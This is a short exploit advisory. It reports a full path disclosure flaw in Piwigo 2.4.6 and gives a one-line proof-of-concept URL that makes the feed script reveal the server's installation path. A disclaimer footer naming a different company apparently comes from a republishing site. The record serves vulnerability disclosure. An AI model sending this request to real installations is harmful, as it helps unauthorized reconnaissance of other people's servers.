# Exploit Title: Piwigo 2.4.6 Full Path Disclosure Vulnerability
# Date: 01/12/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/piwigo-2.4.6.txt
# Vendor Homepage: http://piwigo.org/
# Vendor Status: Informed
# Software Link: http://piwigo.org/download/dlcounter.php?code=latest
# Version: 2.4.6 and probably prior
# Tested on: Windows and Linux
Description:
Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.
Proof of Concept:
http://example.com/feed.php?feed=%
Done!
Proof: http://goo.gl/UQm4W
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information